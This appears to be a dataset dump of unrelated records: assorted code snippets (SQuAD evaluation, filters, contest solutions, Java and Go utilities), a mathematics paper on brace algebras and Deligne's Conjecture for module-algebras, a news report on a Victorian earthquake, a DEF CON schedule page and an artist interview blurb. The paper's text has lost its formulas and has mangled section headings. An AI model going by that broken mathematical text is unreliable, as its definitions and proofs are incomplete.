content
stringlengths 10
4.9M
|
---|
import json
import logging
import os
from typing import Dict, List, Union
from repro.common import TemporaryDirectory
from repro.common.docker import make_volume_map, run_command
from repro.data.types import MetricsType
from repro.models import Model
from repro.models.squad_v2 import DEFAULT_IMAGE, MODEL_NAME
logger = logging.getLogger(__name__)
@Model.register(MODEL_NAME)
class SQuADv2Evaluation(Model):
def __init__(self, image: str = DEFAULT_IMAGE):
self.image = image
def predict(
self, instance_id: str, prediction: str, null_probability: float, **kwargs
) -> MetricsType:
# We cannot evaluate just one instance
raise NotImplementedError
def predict_batch(
self, inputs: List[Dict[str, Union[str, float]]], *args, **kwargs
) -> MetricsType:
with TemporaryDirectory() as temp:
host_input_dir = f"{temp}/input"
host_output_dir = f"{temp}/output"
volume_map = make_volume_map(host_input_dir, host_output_dir)
container_input_dir = volume_map[host_input_dir]
container_output_dir = volume_map[host_output_dir]
host_pred_file = f"{host_input_dir}/pred.json"
host_na_prob_file = f"{host_input_dir}/na_prob.json"
container_pred_file = f"{container_input_dir}/pred.json"
container_na_probfile = f"{container_input_dir}/na_prob.json"
predictions = {}
na_probs = {}
for inp in inputs:
instance_id = inp["instance_id"]
predictions[instance_id] = inp["prediction"]
na_probs[instance_id] = inp["null_probability"]
os.makedirs(host_input_dir)
with open(host_pred_file, "w") as out:
out.write(json.dumps(predictions, indent=2))
with open(host_na_prob_file, "w") as out:
out.write(json.dumps(na_probs, indent=2))
host_output_file = f"{host_output_dir}/eval.json"
container_output_file = f"{container_output_dir}/eval.json"
command = (
f"python evaluate-v2.0.py"
f" dev-v2.0.json"
f" {container_pred_file}"
f" --na-prob-file {container_na_probfile}"
f" --out-file {container_output_file}"
)
os.makedirs(host_output_dir)
run_command(
self.image, command, volume_map=volume_map, network_disabled=True
)
metrics = json.load(open(host_output_file, "r"))
return metrics
|
# -*- coding: utf8 -*-
"""
...
"""
from __future__ import absolute_import, division, print_function
import logging
from .base_stat_swfilter import BaseStatSWFilter
class AlphaBetaSWFilter(BaseStatSWFilter):
"""
https://en.wikipedia.org/wiki/Alpha_beta_filter
"""
__logger = logging.getLogger(__name__)
def aggregate_windows(self,
window_seq,
alpha=0.85,
beta=0.005,
return_error=False,
**kwargs):
"""
:param window_seq:
:param alpha:
:param beta:
:param return_error:
:param kwargs:
:return:
"""
estimation = 0
velocity = 0
for window in window_seq:
for item in window:
position = estimation + velocity
residual_error = item - position
position += alpha * residual_error
velocity += beta * residual_error
estimation = position
if return_error:
yield residual_error
else:
yield estimation
|
Brace operations and Deligne's Conjecture for module-algebras
It is observed that Kaygun's Hopf-Hochschild cochain complex for a module-algebra is a brace algebra with multiplication. As a result, (i) an analogue of Deligne's Conjecture holds for module-algebras, and (ii) the Hopf-Hochschild cohomology of a module-algebra has a Gerstenhaber algebra structure.
I
Let H be a bialgebra and let A be an associative algebra. The algebra A is said to be an
H-module-algebra if there is an H-module structure on A such that the multiplication on
A becomes an H-module morphism. For example, if S denotes the Landweber-Novikov algebra , then the complex cobordism MU * (X) of a topological space X is an Smodule-algebra. Likewise, the singular mod p cohomology H * (X; F p ) of a topological space X is an A p -module-algebra, where A p denotes the Steenrod algebra associated to the prime p . Other similar examples from algebraic topology can be found in .
Important examples of module-algebras from Lie and Hopf algebras theory can be found in, e.g., .
In , Kaygun defined a Hochschild-like cochain complex CH * Hopf (A, A) associated to an H-module-algebra A, called the Hopf-Hochschild cochain complex, that takes into account the H-linearity. In particular, if H is the ground field, then Kaygun's Hopf-Hochschild cochain complex reduces to the usual Hochschild cochain complex C * (A, A) of A . Kaygun showed that the Hopf-Hochschild cohomology of A shares many properties with the usual Hochschild cohomology. For example, it can be described in terms of derived functors, and it satisfies Morita invariance.
The usual Hochschild cochain complex C * (A, A) has a very rich structure. Namely, it is a brace algebra with multiplication . Combined with a result of McClure and Smith concerning the singular chain operad associated to the little squares operad C 2 , the brace algebra with multiplication structure on C * (A, A) leads to a positive solution of Deligne's Conjecture . Also, passing to cohomology, the brace algebra with multiplication structure implies that the Hochschild cohomology modules HH * (A, A) form a Gerstenhaber algebra, which is a graded version of a Poisson algebra. This fact was first observed by Gerstenhaber .
The purpose of this note is to observe that Kaygun's Hopf-Hochschild cochain complex CH * Hopf (A, A) of a module-algebra A also admits the structure of a brace algebra with multiplication. As in the classical case, this leads to a version of Deligne's Conjecture for module-algebras. Also, the Hopf-Hochschild cohomology modules HH * Hopf (A, A) form a Gerstenhaber algebra. When the bialgebra H is the ground field, these structures reduce to the ones in Hochschild cohomology.
A couple of remarks are in order. First, there is another cochain complex F * (A) that can be associated to an H-module-algebra A . The cochain complex F * (A) is a differential graded algebra. Moreover, it controls the deformations of A, in the sense of Gerstenhaber , with respect to the H-module structure, leaving the algebra structure on A fixed. It is not yet known whether F * (A) is a brace algebra with multiplication and whether the cohomology modules of F * (A) form a Gerstenhaber algebra.
Second, the results and arguments here can be adapted to module-coalgebras, comodule-algebras, and comodule-coalgebras. To do that, one replaces the crossed product algebra X ( §2.3) associated to an H-module-algebra A by a suitable crossed product (co)algebra and replaces Kaygun's Hopf-Hochschild cochain complex by a suitable variant.
1.1. Organization. The rest of this paper is organized as follows.
In the following section, we recall the construction of the Hopf-Hochschild cochain complex CH * Hopf (A, A) from Kaygun . In Section 3, it is observed that CH * Hopf (A, A) has the structure of an operad with multiplication (Theorem 3.4). This leads in Section 4 to the desired brace algebra with multiplication structure on CH * Hopf (A, A) (Corollary 4.4). Explicit formulas for the brace operations are given.
In Section 5, it is observed that the brace algebra with multiplication structure on CH * Hopf (A, A) leads to a homotopy G-algebra structure (Corollary 5.3). The differential from this homotopy G-algebra and the Hopf-Hochschild differential are then identified, up to a sign (Theorem 5.5). Passing to cohomology, this leads in Section 6 to a Gerstenhaber algebra structure on the Hopf-Hochschild cohomology modules HH * Hopf (A, A) (Corollary 6.3). The graded associative product and the graded Lie bracket on HH * Hopf (A, A) are explicitly described.
In the final section, by combining our results with a result of McClure and Smith , a version of Deligne's Conjecture for module-algebras is obtained (Corollary 7.1). This section can be read immediately after Section 4 and is independent of Sections 5 and 6.
H-H
In this section, we fix some notations and recall from the Hopf-Hochschild cochain complex associated to a module-algebra. Let A = (A, µ A ) denote an associative, unital K-algebra with unit 1 A (or simply 1).
In a coalgebra (C, ∆), we use Sweedler's notation for comultiplication: These notations will be used throughout the rest of this paper.
Module-algebra.
Recall that the algebra A is said to be an H-module-algebra if and only if there exists an H-module structure on A such that µ A is an H-module We will assume that A is an H-module-algebra for the rest of this paper.
Crossed product algebra. Let X be the vector space
for a 1 ⊗a ′ 1 ⊗b 1 and a 2 ⊗a ′ 2 ⊗b 2 in X. It is shown in that X is an associative, unital K-algebra, called the crossed product algebra.
The algebra A is an X-module via the action
It is mentioned above that each vector space CB
Therefore, CB * (A) can be regarded as a chain complex of X-modules.
Note that in the case H = K, the chain complex CB * (A) of A ⊗ A op -modules is the usual bar complex of A.
Hopf-Hochschild cochain complex. The Hopf-Hochschild cochain complex of A
with coefficients in A is the cochain complex of vector spaces: Its nth cohomology module, denoted by HH n Hopf (A, A), is called the nth Hopf-Hochschild cohomology of A with coefficients in A.
When H = K, the cochain complex (CH * Hopf (A, A), d CH ) is the usual Hochschild cochain complex of A with coefficients in itself , and HH n Hopf (A, A) is the usual Hochschild cohomology module.
In what follows, we will use the notation CH * Hopf (A, A) to denote (i) the Hopf-
A
The purpose of this section is to show that the vector spaces CH * Hopf (A, A) in the Hopf-Hochschild cochain complex of an H-module-algebra A with self coefficients has the structure of an operad with multiplication.
(1) The structure maps γ are required to be associative, in the sense that Here f ∈ O(k), g i ∈ O(n i ), N = n 1 + · · · + n k , and N i = n 1 + · · · + n i . Given elements . ., the symbol x i, j is the abbreviation for the sequence x i , x i+1 , . . . , x j or (2) The identity element Id ∈ O(1) is required to satisfy the condition that the linear map γ(−; Id, . . . , is equal to the identity map on O(k) for each k ≥ 1.
What is defined above is usually called a non-Σ operad in the literature. 3.3. Operad with multiplication structure on CH * Hopf (A, A). In what follows, in order to simplify the typography, we will sometimes write C(n) for the vector space CH n Hopf (A, A). To show that the vector spaces CH * Hopf (A, A) form an operad with multiplication, we first define the structure maps, the identity element, and the multiplication.
Structure maps: For k, n 1 , . . . , n k ≥ 1, define a map by setting Here the notations are as in the definition of an operad above, and each a i ∈ A.
Identity element: Let Id ∈ C(1) be the element such that This is indeed an element of C(1), since the identity map on A is H-linear.
Proof. It is immediate from (3.3.2) and (3.3.3) that γ(−; Id ⊗k ) is the identity map on C(k)
for each k ≥ 1.
To prove associativity of γ, we use the notations in the definition of an operad and compute as follows: = γ( f ; . . . , γ(g i ; h N i−1 +1,N i ), . . .)(a 0 ⊗ · · · ⊗ a M+1 ). Here the element z i (1 ≤ i ≤ k) is given by This shows that γ is associative and that C = {C(n), γ, Id} is an operad.
This finishes the proof of Theorem 3.4.
B
The purpose of this section is to show that the graded vector space CH * Hopf (A, A) admits the structure of a brace algebra with multiplication.
Brace algebra.
For a graded vector space V = ⊕ ∞ n=1 V n and an element x ∈ V n , set deg x = n and |x| = n − 1. Elements in V n are said to have degree n.
Recall from that a brace algebra is a graded vector space V = ⊕V n together with a collection of brace operations x{x 1 , . . . , x n } of degree −n, satisfying the associativity axiom: Here the sign is given by ε = m p=1 |x p | Combining this discussion with Theorem 3.4, we obtain the following result. The brace operations on CH * Hopf (A, A) can be described more explicitly as follows. For f ∈ C(k) and g i ∈ C(m i ) (1 ≤ i ≤ n), we have f {g 1 , . . . , g n } = (−1) ε γ( f ; Id r 1 , g 1 , Id r 2 , g 2 , . . . , Id r n , g n , Id r n+1 ), (4.4.1) where Id r = Id ⊗r . Here the r j are given by Write M = n i=1 m i and M j = j i=1 m i . Then for an element a 0, k+M−n+1 ∈ A ⊗(k+M−n) , we have ⊗ a i n +M−n+2, k+M−n+1 ).
H G
The purpose of this section is to observe that the brace algebra with multiplication structure on CH * Hopf (A, A) induces a homotopy Gerstenhaber algebra structure.
Homotopy G-algebra.
Recall from that a homotopy G-algebra consists of a brace algebra V = ⊕V n , a degree +1 differential d, and a degree 0 associative ∪-product that make V into a differential graded algebra, satisfying the following two conditions.
(1) The ∪-product is required to satisfy the condition (2) The differential is required to satisfy the condition , where the ∪-product and the differential are defined as: (A, A), namely, the differential d n (5.2.1) induced by the multiplication π and the Hopf-Hochschild differential d n CH . The following result ensures that the cohomology modules defined by these two differentials are the same. Proof. Pick f ∈ CH n Hopf (A, A). Then we have
Corollary 5.6. There is an isomorphism of cochain complexes
Moreover, the cohomology modules on CH * Hopf (A, A) defined by the differentials d CH and d are equal.
G
The purpose of this section is to observe that the homotopy G-algebra structure on CH * Hopf (A, A) gives rise to a G-algebra structure on the Hopf-Hochschild cohomology modules HH * Hopf (A, A). consists of a graded vector space V = ⊕V n , a degree 0 associative ∪-product, and a degree −1 graded Lie bracket satisfying the following two conditions: In other words, the ∪-product is graded commutative, and the Lie bracket is a graded derivation for the ∪-product. In particular, a G-algebra is a graded version of a Poisson algebra. This algebraic structure was first studied by Gerstenhaber . Combining the previous paragraph with Corollary 5.3 and Corollary 5.6, we obtain the following result.
D' C -
The purpose of this section is to observe that a version of Deligne's Conjecture holds for the Hopf-Hochschild cochain complex of a module-algebra. The original Deligne's Conjecture for Hochschild cohomology is as follows.
Deligne's Conjecture ( ). The Hochschild cochain complex C * (R, R) of an associative algebra R is an algebra over a suitable chain model of May's little squares operad C 2 . |
<reponame>gustavo-mendel/my-college-projects
n = int(input())
arr = [int(e) for e in input().split()]
c = int(input())
ans = 0
for e in arr:
if e == c:
ans -= e
else:
ans += e
print(ans)
|
#include<stdio.h>
int main()
{
int a[100000],b[100000];
int d[100000],e[100000];
int n,c;
int i,j,l;
scanf("%d%d",&n,&c);
for(i=0;i<n;i++)
scanf("%d",&a[i]);
for(i=0;i<n;i++)
scanf("%d",&b[i]);
long long int c1=0;
long long int c2=0;
long long int k1=0;
long long int k2=0;
long long int k,m;
for(i=0;i<n;i++)
{
k1=k1+b[i];
k=a[i]-c*k1;
if(k<=0)
k=0;
//printf("%d k1",k1);
c1+=k;
k2+=b[n-i-1];
m=a[n-i-1]-c*k2;
if(m<=0)
m=0;
c2+=m;
}
if(c1>c2)
{
printf("Limak\n");
}
else if(c2>c1)
{
printf("Radewoosh\n");
}
else
{
printf("Tie");
}
return 0;
}
|
import {
FC,
useEffect,
} from 'react';
import { useHistory } from 'react-router-dom';
import { useGameState } from '../../contexts/gameController';
import { GamePhase } from '../../models/Allegiance';
const PhaseController: FC<{}> = () => {
const history = useHistory()
const state = useGameState(gameState => gameState.gamePhase)
useEffect(() => {
switch (state) {
case GamePhase.SETUP:
history.replace('/')
break
case GamePhase.DAY:
history.replace('/day')
break
case GamePhase.NIGHT:
history.replace('/night')
break
case GamePhase.END:
history.replace('/end')
break
}
}, [state])
return null
}
export default PhaseController
|
def save_fig(self, directory, filename=None):
if filename:
if os.path.splitext(filename)[1] == "":
filename += '.html'
else:
filename = get_filename(self, ext='.html')
save_plotly(self.fig, directory=directory, filename=filename) |
// We are now processing a node
void OsmLuaProcessing::setNode(NodeID id, LatpLon node, const std::map<std::string, std::string> &tags) {
reset();
osmID = id;
isWay = false;
isRelation = false;
setLocation(node.lon, node.latp, node.lon, node.latp);
currentTags = tags;
luaState["node_function"](this);
if (!this->empty()) {
TileCoordinates index = latpLon2index(node, this->config.baseZoom);
for (auto jt = this->outputs.begin(); jt != this->outputs.end(); ++jt) {
osmMemTiles.AddObject(index, *jt);
}
}
} |
//should be done in the object thread
void RemoteObject::onSocketDisconnected(std::string error)
{
close("Socket Disconnected", true);
throw PointerLockException();
} |
// HasJob returns if a jobName is loaded or not.
func (jm *JobManager) HasJob(jobName string) (hasJob bool) {
jm.Lock()
_, hasJob = jm.jobs[jobName]
jm.Unlock()
return
} |
Habitat surveys as a tool to assess the benefits of stream rehabilitation II: macroinvertebrate communities
Many streams in Europe have been physically degraded by human manipulation and habitats have consequently been lost (e.g. M0LLER 1995). In Denmark, cultivation o f farmland during the last century has resulted in extensive straightening and culverting of watercourses and more than 90% of Denmark's 35,000 km of natural streams has been physically modified (IVERSEN et al. 1993). One way to counteract this degradation is to rehabilitate riparian and instream habitats. Consequently, numerous stream restoration projects have been undertaken in Denmark in recent years to improve stream physical conditions and thereby increase the rate of ecosystem recovery (e.g. HANSEN 1996). Hitherto, however, only a few investigations have documented the benefits of stream rehabilitation projects on stream biota (e.g. FRIBERG et al. 1994, 1998). One reason has been the laek of a method to assess habitat improvements able to link the changed physical features to the biota. The aim of the present paper is to investigate if a habitat classification based on physical features in a restored reach of the River Gelsa is reflected in macroinvertebrate species composition within these habitats. |
epub ( Nook ) mobi ( kindle ) Load the Defcon schedule into your eBook reader.
Combines FAQs / News / Talks / Maps
v1 - Social Engineering Village, DEF CON Speakers, Workshops and DemoLabs,
Packet Hacking Village Talks and Workshops, SkyTalks, Data Duplication Village,
Blue Team Village, Blockchain & Cryptocurrency Open Security Village,
Ethics Village, Recon Village, Hardware Hacking Village, Venue maps added,
Locations updated with keys, Location Keys linked to Maps, Bio Hacking Village,
Artificial Intelligence ( AI ) Village, Car Hacking Village, Contests & Events events added,
Parties & Meetups events added, Crypto Privacy Village added,
Internet Of Things Village ( IoT ) added, Industrial Control Systems ( ICS ) Village added,
Voting Machine Hacking Village added, Wireless Village added, Puff Puff Hack Village added,
ics calander link added
One Page Schedule - last modified Saturday, 11-Aug-2018 09:32:38 PDT View or download to view directly from the browser on your device.
last modified Saturday, 11-Aug-2018 09:32:38 PDT
Multi Page Schedule Thur Fri Sat Sun
Some browsers have a problem with a very LARGE single page.
Try this set of files if you're having trouble with the above page.
csv last modified Saturday, 11-Aug-2018 09:32:38 PDT CSV file for your use, what ever you come up with.
ical last modified Saturday, 11-Aug-2018 09:32:38 PDT
public Google calendar, best viewed in Agenda mode ical file to import into your calendar |
/**
* A decorator over the {@link ILogToken} API that accepts a log token and routes all the calls
* from the inner token that is used for creation of this class.
* This could be potentially used for scenarios where you have to write a custom execution path
* implementation and {@link com.microsoft.snippet.Snippet#startCapture(String)} and {@link Snippet#startCapture()}
* return a log token that contains the {@link ExecutionContext}.
* Using this token we can use the returned execution context information and do additional work that
* we need to perform.
*/
public class ExtendableLogToken implements ILogToken {
private final ILogToken mSnippetToken;
public ExtendableLogToken(ILogToken logToken) {
this.mSnippetToken = logToken;
}
@Override
public ExecutionContext endCapture(String message) {
return mSnippetToken.endCapture(message);
}
@Override
public ExecutionContext endCapture() {
return mSnippetToken.endCapture();
}
@Override
public final long getStart() {
return mSnippetToken.getStart();
}
@Override
public final long getEnd() {
return mSnippetToken.getEnd();
}
@Override
public final void setStart(long start) {
mSnippetToken.setStart(start);
}
@Override
public final void setEnd(long start) {
mSnippetToken.setEnd(start);
}
@Override
public final ILogToken overrideFilter(String newFilter) {
return mSnippetToken.overrideFilter(newFilter);
}
@Override
public final String filter() {
return mSnippetToken.filter();
}
@Override
public final long creatorThreadId() {
return mSnippetToken.creatorThreadId();
}
@Override
public final boolean isThreadLockEnabled() {
return mSnippetToken.isThreadLockEnabled();
}
@Override
public final ILogToken enableThreadLock() {
return mSnippetToken.enableThreadLock();
}
@Override
public final void setCreatorThreadId(long threadId) {
mSnippetToken.setCreatorThreadId(threadId);
}
@Override
public final void reset() {
mSnippetToken.reset();
}
@Override
public final void addSplit() {
mSnippetToken.addSplit();
}
@Override
public final void addSplit(String message) {
mSnippetToken.addSplit(message);
}
@Override
public final void setState(LogTokenState state) {
mSnippetToken.setState(state);
}
@Override
public final LogTokenState getState() {
return mSnippetToken.getState();
}
} |
Interview with Stelarc (January 16, 2008)
The Cyborg Cometh: It begins with a sinister laugh. Beatific, knowing and bordering on rapture, it revels in the possibilities of imminence, of something significant and profound about to be revealed. While portentous of the unknown, it is at the same time a very familiar, very human signature. But of what? For theorists such as Donna Haraway, Katherine Hayles, and Gilles Deleuze, it speaks of a new conception of the human, evolving with informatic technology into a hybrid biomachine. For the host of this sublime laughter, Stelarc, it speaks on behalf of his performative alter-ego, the body. For more than three decades, Stelarc has explored the increasingly malleable relations between the body and technology. A pioneering exponent of cybernetic art, his work has questioned and broken down the technical and philosophical boundaries between human life as we know it and what it might become. This constant becoming-cyborg in Stelarc’s work has transcended the built environment as well as the distributed spaces of the internet and other telematic interfaces. Eager to identify unexplored somatic possibilities within and between the two, Stelarc is on the lookout for new performance stages, virtual, conceptual, and biological, where conditions of embodiment can be enacted and explored. Stelarc’s website is www.stelarc.va.com.au In this video interview, Stelarc will answer the following questions: |
from pulsar_spectra.catalogue import collect_catalogue_fluxes
from pulsar_spectra.spectral_fit import iminuit_fit_spectral_model
cat_list = collect_catalogue_fluxes()
pulsar = 'J1453-6413'
freqs, fluxs, flux_errs, refs = cat_list[pulsar]
# Broken power law function is in the format
# broken_power_law(v, vb, a1, a2, b, v0)
# start params for (v, vb, a1, a2, b)
start_params = (5e8, -1.6, -1.6, 0.1)
# Fit param limits (min, max) or (v, vb, a1, a2, b)
mod_limits = [(None, None), (-10, 10), (-10, 0), (0, None)]
# None means there is no limit
aic, iminuit_result, fit_info = iminuit_fit_spectral_model(
freqs,
fluxs,
flux_errs,
refs,
model_name="broken_power_law",
start_params=start_params,
mod_limits=mod_limits,
plot=True,
save_name="J1453-6413_broken_power_law.png",
) |
/**
* This function will display the choices to the user.
* The value of the function will be the selection.
**/
static int menu()
{
int choice;
printf("\tStock Portfolio Management System\n\n");
printf("\t\tPlease make a selection\n\n");
printf("\t1 -- buy a stock\n");
printf("\t2 -- Sell a stock\n");
printf("\t3 -- Report current holdings\n");
printf("\t4 -- Report gains and losses for the year\n");
printf("\t5 -- Remove a current holding\n");
printf("\t6 -- Done\n\n");
choice = 0;
while(choice == 0)
{
printf("\t?");
choice = getchar();
getchar();
if(choice < '1') choice = 0;
if(choice > '6') choice = 0;
if(choice == 0) error(0);
}
return choice;
} |
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
package com.azure.cosmos.implementation.query.orderbyquery;
import com.azure.cosmos.implementation.query.ItemComparator;
import com.azure.cosmos.implementation.query.QueryItem;
import com.azure.cosmos.implementation.query.SortOrder;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.Serializable;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Comparator;
import java.util.List;
import static java.lang.Integer.signum;
public final class OrderbyRowComparer<T> implements Comparator<OrderByRowResult<T>>, Serializable {
private static final Logger logger = LoggerFactory.getLogger(OrderbyRowComparer.class);
private static final long serialVersionUID = 7296627879628897315L;
private final List<SortOrder> sortOrders;
public OrderbyRowComparer(Collection<SortOrder> sortOrders) {
this.sortOrders = new ArrayList<>(sortOrders);
}
@Override
public int compare(OrderByRowResult<T> r1, OrderByRowResult<T> r2) {
try {
// comparing document (row) vs document (row)
List<QueryItem> result1 = r1.getOrderByItems();
List<QueryItem> result2 = r2.getOrderByItems();
if (result1.size() != result2.size()) {
throw new IllegalStateException("OrderByItems cannot have different sizes.");
}
if (result1.size() != this.sortOrders.size()) {
throw new IllegalStateException("OrderByItems cannot have a different size than sort orders.");
}
for (int i = 0; i < result1.size(); ++i) {
int cmp = ItemComparator.getInstance().compare(result1.get(i).getItem(), result2.get(i).getItem());
if (cmp != 0) {
switch (this.sortOrders.get(i)) {
case Ascending:
return signum(cmp);
case Descending:
return -signum(cmp);
}
}
}
return r1.getSourceRange().getRange().getMin()
.compareTo(r2.getSourceRange().getRange().getMin());
} catch (Exception e) {
// Due to a bug in rxjava-extras <= 0.8.0.15 dependency,
// if OrderbyRowComparer throws an unexpected exception,
// then the observable returned by Transformers.orderedMergeWith(.) will never emit a terminal event.
// rxjava-extras lib provided a quick fix on the bugreport:
// https://github.com/davidmoten/rxjava-extras/issues/30 (0.8.0.16)
// we are also capturing the exception stacktrace here
logger.error("Orderby Row comparison failed {}, {}", r1.toJson(), r2.toJson(), e);
throw e;
}
}
public List<SortOrder> getSortOrders() {
return this.sortOrders;
}
}
|
#!/usr/bin/env pypy3
def ans(A):
count = [0]*25
for a in A:
s = "{0:b}".format(a)
s = list(s[::-1])
for i, e in enumerate(s):
if e == '1':
count[i] += 1
ret = 0
while sum(count):
next = [0]*25
for i in range(25):
if count[i] > 0:
count[i] -= 1
next[i] += 1
next = ''.join(str(x) for x in next)
next = int(next[::-1], 2)
ret += next**2
return ret
input()
A = input().split(' ')
A = [int(a) for a in A]
print(ans(A)) |
def create(self):
raise CloudantIndexException(101) |
/**
* A class to facilitate the detection of the most likely decryption key for a
* cipher-text encrypted with the simple substitution cipher.
*
* @author Max Wood
* @see Substitution
*/
public class ProbableSubstitutions {
private final char[] FREQUENCY_ORDER;
private final char[] ALPHABET;
public ProbableSubstitutions() {
FREQUENCY_ORDER = "ETAOINSRHDLUCMFYWGPBVKXQJZ".toLowerCase().toCharArray();
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ".toLowerCase().toCharArray();
}
/**
* Returns an array of possible mapping for a mono-alphabetic substitution
* cipher based on frequency analysis.
*
* @param letterFrequencies A TreeMap ordered alphabetically containing the
* letters observed in the cipher text and their
* respective frequencies.
* @return An array of type Mapping describing the most likely letter
* substitutions based on frequency analysis of the cipher text.
*/
public Mapping[] probableSubstitutionGenerator(TreeMap<String, Double> letterFrequencies) {
Mapping[] mappings = new Mapping[26]; // An array of Mappings, one for each letter of the alphabet.
int pointer = 0;
TreeMap<String, Double> freqs = letterFrequencies; // This temporarily handles all the frequencies to allow for
// data removal without harming the input to the function.
while (!freqs.isEmpty()) {// Tests to see if all the data has been assigned to a mapping.
String target = maxKey(freqs); // Finds the character corresponding to the highest probability.
mappings[pointer] = new Mapping(target.charAt(0), FREQUENCY_ORDER[pointer]);
// Creates a new mapping, in probability order with the particular character.
freqs.remove(target); // Removes character to avoid repeats.
pointer++;
}
for (char letter : ALPHABET) {
/*
* This corrects for any character that did not exist in the cipher text as
* those mapping must still be accounted for in the array.
*/
if (pointer > 25) // Prevents index out of bounds error when iterating through the array.
break;
if (!letterFrequencies.containsKey(Character.toString(letter))) { // If the letter of the alphabet doesn't
// exist in the cipher text.
mappings[pointer] = new Mapping(letter, FREQUENCY_ORDER[pointer]); // Creates new mapping.
pointer++;
}
}
return mappings;
}
/**
* Returns the string corresponding to the maximum double value in a <String,
* Double> Map
*
* @param freqs The input <String, Double> Map.
* @return The key corresponding to the maximum double value in the map.
*/
public String maxKey(TreeMap<String, Double> freqs) {
if(freqs.keySet().size() == 0) {
throw new IllegalArgumentException("Map size cannot be 0.");
}
return freqs.entrySet().stream().max((Entry<String, Double> entry1, Entry<String, Double> entry2) -> entry1
.getValue().compareTo(entry2.getValue())).get().getKey();
/*
* Looks through all the K, V pairs in the map, comparing all values. One is set
* to the max of the two and the next value in the map is compared to the
* current maximum. When the final maximum value is found, the corresponding key
* is returned.
*/
}
} |
Magnitude-5.4 quake shakes southern Victoria
Updated
South-east Victoria has been rocked by more than 40 aftershocks after a magnitude-5.4 earthquake hit near Moe in Gippsland on Tuesday night.
The tremor struck 16 kilometres west of Moe, but was felt in the centre of Melbourne and in suburbs across the city's west and south-east.
Initially measured at magnitude-5.3, it was also felt as far north as Shepparton and even Albury on the border with New South Wales.
The SES said it received dozens of calls for help for cracked walls and ceilings and a collapsed garage and chimney.
Residents and business owners are being urged to check their properties for damage before returning inside.
But the SES says there have been no reports of major damage.
Residents reported hearing a roaring noise as the quake hit just before 9:00pm at a depth of about 10km.
An SES spokesman told ABC News Breakfast there were 850 calls to emergency services in the first hour after the quake.
"The damage we've seen has largely been minor cracks in walls and a garage that has had some damage. We've also seen some shops that have had some stock come off the shelves," he said.
He said some homes did lose power after the quake but there have been no significant reports of gas leaks.
Did you feel it? Send us your photos.
One of Australia's top earthquake specialists says last night's earthquake was the latest and biggest in a cluster spanning three years in the region.
Gary Gibson from the Melbourne University says his department has been installing more equipment in the area because of the increased frequency of quakes.
He says last night's event at Moe was much further east than the series of quakes at Korumburra.
He said the cluster started in January 2009 with magnitude-3.5 tremors.
"It was followed in March by two magnitude.4.6 earthquakes and lots of aftershocks, and they've continued ever since," he said.
"We had a magnitude-4.5 in July last year, there's about 400 altogether that's happened."
Seismologist David Jepsen said there were aftershocks of around magnitude 3.5 near the epicentre.
"[It was a] shallow earthquake. That's why people felt it so strongly," he said.
"You do get the rolling because you get the surface waves that get generated that people can feel quite strongly."
ABC reporter Hamish Fitzsimmons spoke with a number of residents in a pub near the epicentre, who said glasses crashed to the ground.
We have spoken to people in Moe and there are reports of things like supermarket shelves falling down and things coming off supermarket shelves. I spoke to the people in the Moe pub and they said glasses and bottles had come down. There was a pool competition going on there, and a woman I spoke to said she thought that the pool players may have thought they had been going at it a bit long. But there have been no injuries reported so far. There was one incident - we spoke to the ambulance service - someone was unlucky enough to be on a ladder at the time of the earthquake and they fell off. ABC reporter Hamish Fitzsimmons
Houses 'vibrating'
Some Melbourne residents also reported seeing windows shaking during the tremor.
Graham Miller, a resident in Heathmont in Melbourne's east, said it was the biggest earthquake he had ever felt.
"The most severe earthquake that I would say we've experienced at Heathmont in 60 years to my knowledge," he said.
"The shaking continued for about 45 seconds, and my whole house was vibrating visibly."
Shannon Starab McGill, a resident in Badger Creek, north-east of Melbourne, also felt the quake.
"Shook the heck out of the house and the kids woke up quite startled! Yikes!" he wrote on Facebook.
Syd Pargeter also felt the earthquake at his home at Harkaway, 50 kilometres south-east of Melbourne.
"[I felt] a gentle shake coming on and I thought, God, is it a train running through the back of the house or something?
"And it built up, built up, built up, and then the real thing really started to shake ... for 20 shakes, and then it trailed off the way it started."
Victoria's Emergency Services Minister Peter Ryan says authorities handled the earthquake well.
"There were a lot of calls, and the Premier and I in fact went to the State Control Centre at about 11 o'clock last night and spent about a half an hour with them as they were liaising with the different agencies," he said.
"But everything is under control, I'm pleased to say, and the main thing is no one was injured."
Professor Mike Sandiford of the School of Earth Sciences at the University of Melbourne says it is an unusual event.
"It was a significant shaking event. We don't often get earthquakes which shake much of Melbourne," he said.
"Every few years we have an earthquake which tends to be to the south-east of Melbourne in Gippsland which impacts the eastern suburbs, shaking the eastern suburbs and even more rarely gets to the city centre."
The Federal Government says most home, building and contents insurance covers earthquake damage but individuals should check their policies.
The Federal Minister responsible for insurance, Bill Shorten, says insurers should exercise diligence and compassion.
"I've been in touch with the insurance council since the earthquake occurred. The Insurance Council of Australia has advised me unambiguously that home and contents insurance policy does cover for earthquake damage," he said.
The SES information line is 1300 842 737.
Topics: earthquake, disasters-and-accidents, moe-3825, trafalgar-3824, vic, australia
First posted |
/**
* Option provider for RunDeck - see http://rundeck.org/docs/RunDeck-Guide.html#option-model-provider<br>
* Provider for artifactId of artifacts presents in the Nexus repository, and matching the request.
*
* @author Vincent Behar
*/
@Singleton
@Named("ArtifactIdOptionProvider")
@Typed(PlexusResource.class)
public class ArtifactIdOptionProvider extends AbstractOptionProvider {
@Inject
@Named("mavenCoordinates")
private Searcher searcher;
@Override
public String getResourceUri() {
return "/rundeck/options/artifactId";
}
@Override
public Object get(Context context, Request request, Response response, Variant variant) throws ResourceException {
// retrieve main parameters (r, g, a, v, p, c)
Form form = request.getResourceRef().getQueryAsForm();
String repositoryId = form.getFirstValue("r", null);
Map<String, String> terms = new HashMap<String, String>(form.getValuesMap());
// search
IteratorSearchResponse searchResponse;
try {
searchResponse = searcher.flatIteratorSearch(terms,
repositoryId,
null,
null,
null,
false,
SearchType.EXACT,
null);
} catch (NoSuchRepositoryException e) {
throw new ResourceException(Status.CLIENT_ERROR_BAD_REQUEST, "No repository at " + repositoryId, e);
}
// retrieve unique artifactIds and sort them
List<String> artifactIds = new ArrayList<String>();
for (ArtifactInfo aInfo : searchResponse.getResults()) {
String artifactId = aInfo.artifactId;
if (!artifactIds.contains(artifactId)) {
artifactIds.add(artifactId);
}
}
